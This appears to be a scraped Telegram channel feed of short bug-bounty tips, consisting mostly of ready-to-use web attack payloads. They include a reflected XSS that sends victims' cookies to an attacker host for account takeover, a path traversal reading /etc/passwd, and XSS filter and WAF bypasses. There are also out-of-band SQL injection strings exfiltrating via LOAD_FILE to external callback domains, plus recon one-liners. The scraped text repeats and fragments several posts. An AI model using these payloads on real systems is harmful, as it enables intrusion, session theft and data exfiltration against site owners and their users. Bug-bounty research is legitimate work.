Reflected XSS may lead to ATO
Payload:
Simple Tip:
Test php-params.txt for: sqli, xss, html injection...etc
Attacking Cookies:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Payload:
"><script>alert(document.cookie)</script>
Simple Tip:
cat parameters.txt | grep ".php?" > php-params.txt
Test php-params.txt for: sqli, xss, html injection...etc
Attacking Cookies:
https://sub.target.com/en/test.php?vuln-param="><script>document.write('<img src="https://hacker-site/thing/?c='%2bdocument.cookie%2b'" />');</script#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥4❤3⚡2👍1
Payload:
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
site.tld/xyz/xyz/xyz/?path=../../../../../../../../../etc/passwd
#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5❤4⚡3
Bypass dot (.) block in XSS
❌ alert(document.cookie)
✅ alert(cookie)
Some times '
#XSS #BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Some times '
cookie' is a variable declared as 'document.cookie'#XSS #BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡5🔥4❤3
Waf block any
Try HTML injection
Payload:
#BugBounty #Tips
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
"</"Try HTML injection
</a> worked...Payload:
</a<script>alert(document.cookie</script>#BugBounty #Tips
Please open Telegram to view this post
VIEW IN TELEGRAM
❤4⚡2🔥2
A quick way to find "all" paths for Next.js websites:
👩💻 javascript:
#BugBounty #Tips #JS
➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖ ➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
console.log(__BUILD_MANIFEST.sortedPages)console.log(__BUILD_MANIFEST.sortedPages.join('\n'));#BugBounty #Tips #JS
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥8❤3⚡2👍1
Add to your wordlist:
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
auth/jwt/register
auth-demo/register/classic
auth-demo/register/modern
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
❤5⚡3🔥3👍1
WAF AKAMAI Bypass
Lead to 30 XSS in large BBP🤯
#BugBounty #Tips #Waf
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Lead to 30 XSS in large BBP🤯
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
#BugBounty #Tips #Waf
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
❤5🔥5⚡3👍1
Out-of-Band SQL Injection
Payload:
#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
Payload:
'11111111111' AND (SELECT LOAD_FILE('\\\\https://xde3imh45q8x9o4ovz1kea6cd3ju7kv9.oastify.com\\a'))
'11111111111' AND (SELECT CONCAT('', (SELECT SLEEP(5)), (SELECT LOAD_FILE(CONCAT('\\\\', (SELECT 'https://14379q88wuz10svsm3so5exg47ayyqmf.oastify.com/a'))))))#BugBounty #Tips #SQL
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
❤3👍3🔥2⚡1
Extract all endpoints from a JS File and take your bug 🐞
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
👤 t.iss.one/BugCod3BOT
📣 t.iss.one/BugCod3
🔥5❤4👍3⚡1
Finding Hidden Parameter & Potential XSS with Arjun + KXSS
#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 t.iss.one/Root_Exploit
📣 t.iss.one/BugCod3
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss#BugBounty #Tips
➖➖➖➖➖➖➖➖➖➖
📣 t.iss.one/Root_Exploit
📣 t.iss.one/BugCod3
❤3⚡2🔥2